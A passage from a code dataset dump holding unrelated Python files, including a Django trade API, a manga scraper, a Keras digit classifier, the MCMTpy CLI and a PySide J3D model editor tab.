{0}\\nУчебный класс: \"{1}\"\\n'\n 'Учителя: {2}\\nПредметы: {3}'.format(student['full_name'],\n student['class_room'],\n ', '.join(student['teachers']),\n ', '.join(student['lessons'])))\n\nprint('Родители: {0}, {1}'.format(student['parents']['mather'],\n student['parents']['father']))\n\nprint('\\nКласс: \"8А\"\\nПреподаватели: '\n '{0}'.format(', '.join(school.get_teachers('8А'))))\n","sub_path":"lesson6/Normal/les6-1_normal.py","file_name":"les6-1_normal.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"254112053","text":"class Solution:\n\n def canIWin(self, maxChoosableInteger: int, desiredTotal: int) -> bool:\n if (1 + maxChoosableInteger) * maxChoosableInteger / 2 < desiredTotal:\n return False\n self.memo = {}\n return self.helper(list(range(1, maxChoosableInteger + 1)), desiredTotal)\n\n def helper(self, nums, desiredTotal):\n s = str(nums)\n if s in self.memo:\n return self.memo[s]\n\n if nums[-1] >= desiredTotal:\n return True\n\n for i in range(len(nums)):\n if not self.helper(list(nums[:i]) + list(nums[i + 1:]), desiredTotal - nums[i]):\n self.memo[s] = True\n return True\n\n self.memo[s] = False\n return False","sub_path":"2020.10.27_464_Can_I_win.py","file_name":"2020.10.27_464_Can_I_win.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"334353497","text":"# _*_ coding: utf-8 _*_\n# 程序 11-3 (Python 3 version)\n\nfrom firebase import firebase\ndb_url = 'https://python01.firebaseio.com'\nfdb = firebase.FirebaseApplication(db_url, None)\n\nwhile True:\n inv_lotto = dict()\n inv_month = input('请输入开奖月份(例:201511,输入-1结束):')\n if int(inv_month) == -1 :\n break\n inv_lotto['p1000w'] = input('请输入特别奖1000万的号码:')\n inv_lotto['p200w'] = input('请输入特奖200万的号码:')\n inv_lotto['p20w'] = list()\n while True:\n p20w = input('请输入头奖20万的号码(输入-1结束):')\n if int(p20w) == -1:\n break\n inv_lotto['p20w'].append(p20w)\n inv_lotto['p200'] = list()\n while True:\n p200 = input('请输入增开六奖的号码(输入-1结束):')\n if int(p200) == -1:\n break\n inv_lotto['p200'].append(p200)\n print(\"以下是您输入的内容:\")\n print(\"开奖月份:\", inv_month)\n print(\"1000万特别奖:\", inv_lotto['p1000w'])\n print(\"200万特奖:\", inv_lotto['p200w'])\n print(\"20万头奖:\", end=\"\")\n for n in inv_lotto['p20w']:\n print(n + \" \", end=\"\")\n 
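# Illustrative sketch (not part of the original records): in the lesson6 school
# example above, accessors such as get_full_name and get_class_room are decorated
# with @property, which is why the calling code reads student.get_class_room with
# no parentheses. A minimal demonstration (Person and the name are hypothetical):
class Person:
    def __init__(self, name):
        self._name = name

    @property
    def get_name(self):       # accessed as an attribute, not called
        return self._name

p = Person('Ivanov')
print(p.get_name)             # -> 'Ivanov'  (no parentheses: it's a property)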
print(\"\\n200元增开六奖:\", end=\"\")\n for n in inv_lotto['p200']:\n print(n + \" \", end=\"\")\n ans = input(\"\\n是否写入Firebase网络数据库?(y/n)\")\n if ans == 'y' or ans == 'Y':\n fdb.post('/invlotto/' + inv_month, inv_lotto)\n","sub_path":"编程/book_example/11-3.py","file_name":"11-3.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"616924205","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom django.db.models import Sum, Count, Avg\n\nfrom trade.models import Trade\nfrom cloth.models import Cloth\nfrom user.models import User\n\nfrom datetime import datetime, timedelta, timezone\nimport json\n\ndef get_trade_info(trade):\n trade_info = dict(id = trade.trade_id,\n cloth = str(trade.cloth),\n user = str(trade.user),\n cloth_number = trade.cloth_number,\n total_price = str(trade.total_price),\n color = str(trade.color),\n size = str(trade.size),\n time = trade.time.astimezone(timezone(timedelta(hours=8))).strftime(\"%Y-%m-%d %H:%M:%S\"), )\n return json.dumps(trade_info, ensure_ascii = False)\n\ndef trade(request):\n try:\n query_type = request.GET['type']\n if query_type == 'create':\n cloth_id = request.GET['cloth']\n user_id = request.GET['user']\n color = request.GET['color']\n size = request.GET['size']\n\n nowtime = datetime.now().strftime('%Y%m%d%H%M%S')\n trade_id = nowtime + cloth_id + user_id\n cloth = Cloth.objects.get(cloth_id = cloth_id)\n user = User.objects.get(user_id = user_id)\n \n cloth_number = int(request.GET['cloth_number'])\n total_price = request.GET['total_price']\n \n trade = Trade.objects.create(cloth = cloth,\n user = user,\n cloth_number = cloth_number,\n total_price = total_price,\n color = color,\n size = size,\n trade_id = trade_id)\n \n return HttpResponse(json.dumps(dict(trade_id = trade.id, request_info = \"CREATED!\"), ensure_ascii = False))\n \n elif query_type == 'query_id':\n trade_id = request.GET['id']\n trade = Trade.objects.get(trade_id = trade_id)\n \n return HttpResponse(get_trade_info(trade))\n \n elif query_type == 'query_sum_by_user':\n user_name = request.GET['user']\n user = User.objects.get(name = user_name)\n \n trade_info = Trade.objects.filter(user = user).values('user__name').annotate(count = Count('user'), sum_price = Sum('total_price'))\n tmp = list(trade_info)\n if tmp:\n trade_info = dict(user = tmp[0]['user__name'],\n count = tmp[0]['count'],\n sum_price = \"%.2f\" % float(tmp[0]['sum_price']))\n else:\n trade_info = dict(user = user_name, count = 0, sum_price = '0.00')\n \n return HttpResponse(json.dumps(trade_info, ensure_ascii = False))\n \n elif query_type == 'query_sum_by_cloth':\n cloth_name = request.GET['cloth']\n cloth = Cloth.objects.get(name = cloth_name)\n \n trade_info = Trade.objects.filter(cloth = cloth).values('cloth__name').annotate(count = Count('cloth'), sum_price = Sum('total_price'))\n tmp = list(trade_info)\n if tmp:\n trade_info = dict(cloth = tmp[0]['cloth__name'],\n count = tmp[0]['count'],\n sum_price = \"%.2f\" % float(tmp[0]['sum_price']))\n else:\n trade_info = dict(cloth = cloth_name, count = 0, sum_price = '0.00')\n \n return HttpResponse(json.dumps(trade_info, ensure_ascii = False))\n \n elif query_type == 'query_user_by_time':\n user_name = request.GET['user']\n user = User.objects.get(name = user_name)\n i = int(request.GET['i'])\n \n trade = Trade.objects.filter(user = user).order_by('-time')[i - 1]\n \n return HttpResponse(get_trade_info(trade))\n \n elif query_type == 
'query_cloth_by_time':\n cloth_name = request.GET['cloth']\n cloth = Cloth.objects.get(name = cloth_name)\n i = int(request.GET['i'])\n \n trade = Trade.objects.filter(cloth = cloth).order_by('-time')[i - 1]\n \n return HttpResponse(get_trade_info(trade))\n \n else:\n return HttpResponse(json.dumps(dict(request_info = 'WRONG TYPE!'), ensure_ascii = False))\n \n except Exception as e:\n return HttpResponse(json.dumps(dict(request_info = str(e) + '\\n' + 'ERROR!'), ensure_ascii = False))\n\n","sub_path":"trade/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"507826007","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport requests\nimport os\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom progress.bar import Bar\nfrom PIL import Image\nimport math\n\n# Global Variables\n###########################################################################\nprog_bar = None\nmanga_url = sys.argv[1]\nmanga_name = \"final\" # sys.argv[2] if sys.argv[2] is None else \"final\"\nbrowser = webdriver.PhantomJS(executable_path='./driver/phantomjs.exe')\n# webdriver.Chrome('chromedriver.exe')\npdf_index = 0\nsplitIndex = None\n\nfolder_path = {\n \"img\": \"./tmp/img\",\n \"pdf\": \"./tmp/pdf\",\n \"pdfs\": \"./tmp/pdfs\",\n \"output\": \"./output\"\n}\n###########################################################################\n\n'''\ndef __init__():\n # clearFolders()\n'''\n\n\ndef grouperList(l):\n return [l[i:i + splitIndex] for i in range(0, len(l), splitIndex)]\n\n\ndef getImagesFromChapter(chapter_url):\n global prog_bar\n browser.get(chapter_url)\n soup = BeautifulSoup(browser.page_source, 'html.parser')\n manga_images = soup.find_all('img', {'class': 'page-img'}, src=True)\n for i, image in enumerate(manga_images):\n name = f'{folder_path[\"img\"]}/{i:02}.jpeg'\n f = open(name, 'wb')\n f.write(requests.get(image.get('src')).content)\n f.close()\n convert2Pdf()\n delFilefromFolder(folder_path[\"img\"])\n prog_bar.next()\n\n\ndef convert2Pdf():\n global pdf_index\n pdf_file = Image.new('RGB', size=(100, 100), color=(255, 255, 255))\n pdf_name = f'{folder_path[\"pdf\"]}/{pdf_index:03}.pdf'\n imList = [Image.open(f'{folder_path[\"img\"]}/{i}').convert('RGB')\n for i in os.listdir(folder_path[\"img\"])]\n pdf_file.save(pdf_name, \"PDF\", resolution=100.0,\n save_all=True, append_images=imList)\n pdf_file.close()\n pdf_index += 1\n\n\ndef mergePDF():\n if splitIndex is None:\n merger = PdfFileMerger()\n for pdf in reversed([(f'{folder_path[\"pdf\"]}/{i}') for i in os.listdir(folder_path['pdf'])]):\n merger.append(PdfFileReader(open(pdf, 'rb')))\n merger.write(f\"{folder_path['output']}/{manga_name}.pdf\")\n merger.close()\n else:\n tmp_index = 0\n for pdf_subList in grouperList(list(reversed([(f'{folder_path[\"pdf\"]}/{i}') for i in os.listdir(folder_path['pdf'])]))):\n merger = PdfFileMerger()\n for pdf in pdf_subList:\n merger.append(PdfFileReader(open(pdf, 'rb')))\n merger.write(f\"{folder_path['pdfs']}/{tmp_index:02}.pdf\")\n merger.close()\n # delPDFfromList(pdf_subList)\n tmp_index += 1\n merger = PdfFileMerger()\n for tmp_pdf in [(f'{folder_path[\"pdfs\"]}/{i}') for i in os.listdir(folder_path['pdfs'])]:\n merger.append(PdfFileReader(open(tmp_pdf, 'rb')))\n merger.write(f\"{folder_path['output']}/{manga_name}.pdf\")\n merger.close()\n\n\ndef clearFolders():\n 
delFilefromFolder(folder_path[\"img\"])\n delFilefromFolder(folder_path[\"pdf\"])\n delFilefromFolder(folder_path[\"pdfs\"])\n\n\ndef delFilefromFolder(folder_name):\n for the_file in os.listdir(folder_name):\n file_path = os.path.join(folder_name, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef delPDFfromList(list_name):\n for the_file in os.listdir(folder_path['pdf']):\n file_path = os.path.join(folder_path['pdf'], the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n\ndef main():\n page = requests.get(manga_url)\n soup = BeautifulSoup(page.text, 'html.parser')\n chapters_url = soup.find_all(\"a\", {\"class\": \"chapt\"}, href=True)\n global prog_bar, splitIndex\n # split if chapers are > 50 else not split\n splitIndex = math.floor(\n len(chapters_url) / 4) if len(chapters_url) > 50 else None\n prog_bar = Bar('\\t\\tDownloading\\t\\t', max=len(chapters_url))\n for chapter in chapters_url:\n getImagesFromChapter(f'https://bato.to{chapter.get(\"href\")}')\n prog_bar.finish()\n print('Merging pdfs...')\n #prog_bar = Bar('\\t\\Merging\\t\\t', max=len(chapters_url))\n mergePDF()\n clearFolders()\n\n\nif __name__ == '__main__':\n clearFolders()\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"403339261","text":"###################################################\n#\n#\tAuthor: Yury Dzerin\n#\tDate: 07.10, 16.10\n#\n#\tDoc and Query Generator\n#\n#\t2013\n#\n###################################################\n\nimport sqlite3 as db\nimport sys\nimport math\nimport random\n\n\ng_wordsNum = 1000\nprecision = 1000000000\n\ndef computeRelevant(docID, cur):\n\n\tcur.execute(\"SELECT docSize, mu, sigma FROM Documents WHERE rowid=\\\"\" + str(docID)+ \"\\\"\")\n\tfor row in cur:\n\t\tdocSize = row[0]\n\t\tmu = row[1]\n\t\tsigma = row[2]\n\t\n\tqueryIDs = []\n\tcur.execute(\"SELECT rowid FROM QueryIDs\")\n\tfor row in cur:\n\t\tqueryIDs.append(row[0])\n\n\tfor queryID in queryIDs:\n\t\tquery = []\n\t\tcur.execute(\"SELECT wordID from Query WHERE queryID=\\\"\" + str(queryID) + \"\\\"\")\n\t\tfor row in cur:\n\t\t\tquery.append(row[0])\n\t\t\t\n\t\tprop = 0\n\t\tfor i in range(0, len(query)):\n\t\t\tprop += gaussianDist(float(mu), float(sigma), int(query[i]))\n\t\t\t\n\t\trelevant = 1 - pow(1 - prop, docSize)\n\t\n\t\tcur.execute(\"INSERT INTO Quires (queryID, docID, value) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(docID)+ \"\\\", \\\"\" + str(relevant) + \"\\\")\")\n\t\n\ndef gaussianDist(mu, sigma, x):\n\treturn math.exp(-(x - mu)*(x - mu)/(2*sigma*sigma))/(sigma * math.sqrt(2 * math.pi))\n\ndef erfinv(x):\n\treturn (math.sqrt(math.pi) * x)/2 + 1/24 * math.pow(math.pi, 1.5) * math.pow(x, 3) + 7/960 * math.pow(math.pi, 2.5) * math.pow(x, 5)\n\ndef randomWord(mu, sigma, yFrom, yTo):\n\ty = random.randrange(int(yFrom * precision), int(yTo * precision))/precision\n\twordID = math.sqrt(2) * sigma * erfinv(2 * y - 1) + mu\n\treturn int(wordID)\n\ndef addInvertedID(docID, wordID, cur):\n\n\tcur.execute(\"SELECT rowid from InvertedIndices WHERE docID =\\\"\" + str(docID) + \"\\\" AND wordID = \\\"\" + str(wordID) + \"\\\"\")\n\tinvertedID = 0\n\tfor row in cur:\n\t\tinvertedID = row[0]\n\tif invertedID == 0:\n\t\tcur.execute(\"INSERT INTO InvertedIndices (docID, wordID, quantity) VALUES(\\\"\" + str(docID) + \"\\\", \\\"\" + 
str(wordID) + \"\\\", \\\"1\\\")\")\n\t\tinvertedID = cur.lastrowid\n\telse:\t\n\t\tcur.execute(\"UPDATE InvertedIndices SET `quantity`=`quantity`+1 WHERE rowid=\\\"\" + str(invertedID) + \"\\\"\")\n\t\n\treturn invertedID\n\ndef genDocument(cur):\n\n\tmu = random.randrange(0, g_wordsNum)\n\tsigma = random.randrange(1, 10*precision)/precision\n\tdocSize = random.randrange(10, 100)\n\tcur.execute(\"INSERT INTO Documents (docName, docSize, mu, sigma)\\\n\t\tVALUES(\\\"\\\",\\\"\" + str(docSize)+ \"\\\",\\\"\" + str(mu)+ \"\\\", \\\"\" + str(sigma) + \"\\\" )\")\n\tdocID = cur.lastrowid\n\tyFrom = (1 + math.erf((0 - mu)/ (sigma * math.sqrt(2)))) / 2\n\tyTo = (1 + math.erf((g_wordsNum - mu)/ (sigma * math.sqrt(2)))) / 2\n\n\tfor i in range(1, docSize):\n\t\taddInvertedID(docID, randomWord(mu, sigma, yFrom, yTo), cur)\n\t\n\treturn docID\n\ndef genQuery(cur):\n\n\tcur.execute(\"INSERT INTO QueryIds (queryID) VALUES(1)\")\n\tqueryID = cur.lastrowid\n\t\n\tquery = []\n\tqueryLen = random.randrange(0, 4);\n\tfor i in range(0, queryLen):\n\t\tquery.append(random.randrange(0, g_wordsNum + 1) - 1)\n\t\tcur.execute(\"INSERT INTO Query (queryID, wordID) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(query[i]) + \"\\\")\")\n\n\tcur.execute(\"SELECT rowid, docSize, docName, mu, sigma FROM Documents\")\n\trel = {}\n\n\tfor row in cur:\n\t\tprop = 0\n\t\tfor i in range(0, queryLen):\n\t\t\tprop += gaussianDist(float(row[3]), float(row[4]), query[i])\n\t\trelevant = 1 - pow(1 - prop, row[1])\n\t\trel[row[0]] = relevant\n\n\tfor docID in rel.keys():\n\t\tcur.execute(\"INSERT INTO Quires (queryID, docID, value) VALUES(\\\"\" + str(queryID) + \"\\\", \\\"\" + str(docID)+ \"\\\", \\\"\" + str(rel[docID]) + \"\\\")\")\n\ndef generate(numOfDocs, numOfQueries, cur):\n\n\tfor i in range(0, numOfDocs):\n\t\tdocID = genDocument(cur)\n\t\tcomputeRelevant(docID, cur)\n\tfor i in range(0, numOfQueries):\n\t\tgenQuery(cur)\n\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"394135635","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sklearn.decomposition import PCA\n\n# 加载数据\ndef load_data(): \n print(\"====>>===>>===>> LoadData\")\n trainData = pd.read_csv('data/train.csv')\n testData = pd.read_csv('data/test.csv')\n x_train = trainData.values[:, 1:]\n y_train = trainData.values[:, 0]\n x_test = testData.values[:, :]\n # 归一化\n x_train = x_train/255\n x_test = x_test/255\n return x_train, y_train, x_test\n pass \n\n# 降低数据维度\ndef data_pca(x_train, x_test, COMPONENT_NUM):\n print(\"====>>===>>===>> PCA \")\n pca = PCA(n_components=COMPONENT_NUM, copy=True, whiten=False) # 创建一个 PCA 对象\n pca.fit(x_train) # 构建 PCA 模型\n pcaXTrain = pca.transform(x_train)\n pcaXTest = pca.transform(x_test)\n\n return pcaXTrain, pcaXTest\n\n# 训练模型 \ndef create_model(x_train, y_train, x_test):\n print(\"====>>===>>===>> TrainModel \")\n # 定义模型的时候注意初始化输入形状,避免保存的模型有问题\n model = keras.Sequential()\n model.add(keras.layers.Dense(units=500, input_shape=(x_train.shape[1], ), activation='relu'))\n model.add(keras.layers.Dense(units=500, activation='relu'))\n model.add(keras.layers.Dense(units=10, activation='softmax'))\n\n model.compile(optimizer='adam', \n loss='sparse_categorical_crossentropy', \n metrics=['accuracy'])\n\n # epochs:表示一共训练的周期, batch_size:把多少层组合成一个训练单元,多线程加速\n history = 
model.fit(x_train, y_train, epochs=10, batch_size=32)\n model.summary()\n #保存模型\n model.save('model/model1.h5')\n return history\n\ndef saveResultData(x_test):\n model = keras.models.load_model('model/model1.h5')\n # 测试模型\n result = model.predict(x_test)\n print(result)\n\n lenth = len(result)\n test_label = np.zeros((lenth, 1))\n for i in range(lenth):\n test_label[i] = np.argmax(result[i])\n print(test_label)\n # 保存预测结果 , range(1, 28) 到不了 28 \n # 注意保存进入数据库中的格式以及数据的切片\n data = pd.DataFrame({'ImageId': range(1, lenth + 1), 'Label': test_label[:, 0]})\n data.to_csv('data/sample_submission.csv')\n \n\nx_train, y_train, x_test = load_data()\npcax_train, pcax_test = data_pca(x_train, x_test, 0.9)\ntry:\n saveResultData(pcax_test)\nexcept:\n history = create_model(pcax_train, y_train, pcax_test)\n saveResultData(pcax_test)\n\n'''\n# 单独预测某个值,要注意数组格式\nIn [4]: na = np.array([list(pcax_test[0])],)\nIn [5]: model = keras.models.load_model('model/model1.h5'')\n File \"\", line 1\n model = keras.models.load_model('model/model1.h5'') ^\nSyntaxError: EOL while scanning string literal\nIn [6]: model = keras.models.load_model('model/model1.h5')\nIn [7]: model.predict(na)\nOut[7]:\narray([[6.1574175e-15, 4.9995848e-17, 1.0000000e+00, 1.5179449e-17,\n 3.6376498e-19, 3.7012272e-26, 5.9435442e-17, 1.0842079e-13,\n 6.5080575e-19, 1.1886531e-23]], dtype=float32)\n'''\n ","sub_path":"digit_recognize.py","file_name":"digit_recognize.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"505539046","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 17 16:00:28 2021\n\n@author: Fu Yin (yinfu@mail.ustc.edu.cn) at USTC\n\nThis script:\n 1) The coding style refers to the beat (https://hvasbath.github.io/beat/);\n 2) main app function of MCMTpy;\n 3) include user manual and help guide;\n 4) include subcommands.\n\nModify history:\n 1) Mar 17 16:00:28 2021 || Fu Yin at USTC || The initial release.\n 2) ...\n \n\"\"\"\n\n\nimport sys\nfrom MCMTpy.info import version\nfrom MCMTpy import build_GFs\nfrom MCMTpy import syn\nfrom MCMTpy import sample\nfrom MCMTpy import plot\n\n\n\n#%%##########################################################################\n# -----------------------\n# 1. MCMTpy UESR MANUAL\n# -----------------------\n#############################################################################\n### 1.1. program_name\nprogram_name = 'MCMTpy'\n\n### 1.2. subcommand usages\nsubcommand_usages = {\n 'build_GFs': 'build_GFs [pyfk|sem] -c ',\n 'syn': 'syn [pyfk|sem] -c ',\n 'sample': 'sample [Grid|MH|HMC] -c ',\n 'plot': 'plot [pyfk|sem] -c ',\n}\nsubcommands = list(subcommand_usages.keys())\n\n### 1.3. user manual\nusage = program_name + ''' [options] ...-c \n\nVersion:'''+version+'''\nAuthor: Fu Yin\nEmail: yinfu@mail.ustc.edu.cn \n\n\nSubcommands:\n\n build_GFs % create GFs datebase\n syn % synthesize the waveform\n sample % sample the parameters\n plot % visualize the results\n\nTo further help:\n\n MCMTpy --help\n\n''' \n\n\n\n\n\n#%%##########################################################################\n# -------------------------\n# 2. Subcommands Function\n# -------------------------\n#############################################################################\n### 2.1. 
build_GFs function\ndef command_build_GFs(args):\n    \n    if args[0]=='--help':\n        sys.exit('build_GFs usage: '+subcommand_usages['build_GFs']+'\\n'+\n                 'for example: MCMTpy build_GFs [pyfk|sem] -c build_GFs.json ')\n    \n    else:\n        if args[1]=='-c' and len(args)==3:\n            method = args[0] # pyfk or sem\n            filename = args[2] # file.json\n            build_GFs(filename,method)\n        else:\n            sys.exit('MCMTpy: command error')\n\n\n\n### 2.2. syn function\ndef command_syn(args):\n    \n    if args[0]=='--help':\n        sys.exit('syn usage: '+subcommand_usages['syn']+'\\n'+\n                 'for example: MCMTpy syn [pyfk|sem] -c syn.json ')\n    \n    else:\n        if args[1]=='-c' and len(args)==3:\n            method = args[0] # pyfk or sem\n            filename = args[2] # file.json\n            syn(filename,method)\n        else:\n            sys.exit('MCMTpy: command error')\n\n\n\n### 2.3. sample function\ndef command_sample(args):\n    \n    if args[0]=='--help':\n        sys.exit('sample usage: '+subcommand_usages['sample']+'\\n'+\n                 'for example: MCMTpy sample [grid|MH|HMC] -c sample.json ')\n    \n    else:\n        if args[1]=='-c' and len(args)==3:\n            method = args[0] # pyfk or sem\n            filename = args[2] # file.json\n            sample(filename,method)\n        else:\n            sys.exit('MCMTpy: command error')\n\n\n\n### 2.4. plot function\ndef command_plot(args):\n    \n    if args[0]=='--help':\n        sys.exit('plot usage: '+subcommand_usages['plot']+'\\n'+\n                 'for example: MCMTpy plot [pyfk|sem] -c plot.json ')\n    \n    else:\n        if args[1]=='-c' and len(args)==3:\n            method = args[0] # pyfk or sem\n            filename = args[2] # file.json\n            plot(filename,method)\n        else:\n            sys.exit('MCMTpy: command error')\n\n\n\n\n\n#%%##########################################################################\n# ------------------\n# 3. Main Function\n# ------------------\n#############################################################################\n\ndef main():\n    args = list(sys.argv) # function: get parameters from command line. 
For example: mpirun -n 4 MCMTpy build_GFs pyfk -c ./build_GFs.json, args will be = ['MCMTpy', 'build_GFs', 'pyfk', '-c', './build_GFs.json']\n\n if len(args) == 1: # when command line == MCMTpy\n sys.exit('Usage: %s' % usage)\n else:\n command = args[1]\n\n\n if (command in subcommands) and (args[-1] not in ('--help', '-h', 'help')): # execute subcommand\n globals()['command_' + command](args[2:])\n \n elif args[-1] in ('--help', '-h', 'help'): # execute help command\n if command in subcommands:\n globals()['command_' + command](['--help'])\n sys.exit('Usage: %s' % usage)\n \n else:\n sys.exit('MCMTpy: error: no such subcommand: %s' % command)\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n","sub_path":"MCMTpy/apps/MCMTpy.py","file_name":"MCMTpy.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"162781728","text":"\"\"\" HandleBar \"\"\"\n\nimport sys, os\n\nsys.stdout.flush()\nsys.stderr.flush()\nso = file('/tmp/handleBarOut.log', 'a+')\nse = file('/tmp/handleBarError.log', 'a+', 0)\nos.dup2(so.fileno(), sys.stdout.fileno())\nos.dup2(se.fileno(), sys.stderr.fileno())\n\nfrom app import *\nfrom lib import *\n\nreSub()","sub_path":"reSub.py","file_name":"reSub.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"259211614","text":"class publisher:\r\n def __init__(self,pname):\r\n self.pname=pname\r\n def display(self):\r\n print(\"name\",pname)\r\n \r\nclass book(publisher):\r\n def __init__(self,pname,bname,title):\r\n self.pname=pname\r\n self.bname=bname\r\n self.title=title\r\n def display(self):\r\n print(\"pname\",self.pname)\r\n print(\"bname\",self.bname)\r\n print(\"title\",self.title)\r\n\r\nclass python(book):\r\n def __init__(self,pname,bname,title,page,price):\r\n self.pname=pname\r\n self.bname=bname\r\n self.title=title\r\n self.page=page\r\n self.price=price\r\n def display(self):\r\n print(\"pname\",self.pname)\r\n print(\"bname\",self.bname)\r\n print(\"title\",self.pname)\r\n print(\"page\",self.page)\r\n print(\"price\",self.price)\r\n\r\nn=input(\"enter publisher\")\r\nb=input(\"enter book\")\r\nt=input(\"enter title\")\r\np=int(input(\"enter page\"))\r\npr=int(input(\"enter price\"))\r\nobj=python(n,b,t,p,pr)\r\nobj.display()\r\n \r\n","sub_path":"overriding.py","file_name":"overriding.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"344421413","text":"\nimport os\nfrom io import BytesIO\nimport traceback\nfrom PySide6.QtGui import *\nfrom PySide6.QtCore import *\nfrom PySide6.QtWidgets import *\nfrom gcft_paths import ASSETS_PATH\n\nfrom gclib import fs_helpers as fs\nfrom gclib.bunfoe import BUNFOE\nfrom gclib import gx_enums as GX\nfrom gclib.j3d import J3D\nfrom gclib.jchunk import JChunk\nfrom gclib.j3d_chunks.vtx1 import VertexFormat\nfrom gclib.j3d_chunks.jnt1 import Joint\nfrom gclib.j3d_chunks.shp1 import Shape\nfrom gclib.j3d_chunks.mat3 import Material\nfrom gclib.animation import AnimationKeyframe\nfrom gclib.j3d_chunks.mdl3 import MDLEntry, BPRegister, XFRegister\nfrom gclib.j3d_chunks.trk1 import ColorAnimation\nfrom gclib.j3d_chunks.ttk1 import UVAnimation\nfrom gclib.bti import BTI\n\nfrom gcft_ui.uic.ui_j3d_tab import Ui_J3DTab\nfrom gcft_ui.bunfoe_editor import BunfoeEditor, BunfoeWidget\n\nclass J3DTab(BunfoeEditor):\n def __init__(self):\n 
super().__init__()\n self.ui = Ui_J3DTab()\n self.ui.setupUi(self)\n \n self.j3d = None\n self.j3d_name = None\n self.model_loaded = False\n self.ui.j3d_chunks_tree.setColumnWidth(1, 200)\n self.ui.j3d_chunks_tree.setColumnWidth(2, 70)\n \n self.j3d_col_name_to_index = {}\n for col in range(self.ui.j3d_chunks_tree.columnCount()):\n column_name = self.ui.j3d_chunks_tree.headerItem().text(col)\n self.j3d_col_name_to_index[column_name] = col\n \n # TODO: save to settings file?\n self.chunk_type_is_expanded = {\n \"TEX1\": True,\n \"MAT3\": True,\n \"TRK1\": True,\n }\n \n self.isolated_visibility = False\n \n self.ui.export_j3d.setDisabled(True)\n self.ui.load_anim.setDisabled(True)\n \n self.ui.import_j3d.clicked.connect(self.import_j3d)\n self.ui.export_j3d.clicked.connect(self.export_j3d)\n \n self.ui.load_anim.clicked.connect(self.load_anim)\n \n self.ui.j3d_chunks_tree.itemSelectionChanged.connect(self.widget_item_selected)\n self.ui.j3d_chunks_tree.itemExpanded.connect(self.item_expanded)\n self.ui.j3d_chunks_tree.itemCollapsed.connect(self.item_collapsed)\n \n self.ui.j3d_chunks_tree.setContextMenuPolicy(Qt.CustomContextMenu)\n self.ui.j3d_chunks_tree.customContextMenuRequested.connect(self.show_j3d_chunks_tree_context_menu)\n self.ui.actionOpenJ3DImage.triggered.connect(self.open_image_in_j3d)\n self.ui.actionReplaceJ3DImage.triggered.connect(self.replace_image_in_j3d)\n \n self.ui.j3d_viewer.error_showing_preview.connect(self.display_j3d_preview_error)\n self.ui.j3d_viewer.hide()\n self.ui.j3dultra_error_area.hide()\n \n self.field_value_changed.connect(self.update_j3d_preview)\n self.ui.update_j3d_preview.clicked.connect(self.update_j3d_preview)\n self.ui.update_j3d_preview.setIcon(self.style().standardIcon(QStyle.SP_BrowserReload))\n self.ui.toggle_visibility.clicked.connect(self.toggle_isolated_visibility)\n self.icon_visible_all = QIcon(os.path.join(ASSETS_PATH, \"visible_all.png\"))\n self.icon_visible_isolated = QIcon(os.path.join(ASSETS_PATH, \"visible_isolated.png\"))\n self.ui.toggle_visibility.setIcon(self.icon_visible_all)\n # This is just the max size, doesn't need to be exact.\n self.ui.toggle_visibility.setIconSize(QSize(32, 8))\n \n # Make the splitter start out evenly split between all three widgets.\n # TODO: the J3D preview column should be collapsed whenever the preview is not visible\n self.ui.splitter.setSizes([2**30, 2**30, 2**30])\n \n # self.ui.anim_pause_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))\n self.ui.anim_pause_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.ui.anim_slider.valueChanged.connect(self.update_anim_frame)\n \n def import_j3d(self):\n filters = [\n \"All J3D files (*.bmd *.bdl *.bmt *.bls *.btk *.bck *.brk *.bpk *.btp *.bca *.bva *.bla)\",\n \"Models and material tables (*.bmd *.bdl *.bmt)\",\n ]\n \n self.window().generic_do_gui_file_operation(\n op_callback=self.import_j3d_by_path,\n is_opening=True, is_saving=False, is_folder=False,\n file_type=\"J3D file\", file_filter=\";;\".join(filters)\n )\n \n def export_j3d(self):\n filters = []\n current_filter = self.get_file_filter_by_current_j3d_file_type()\n 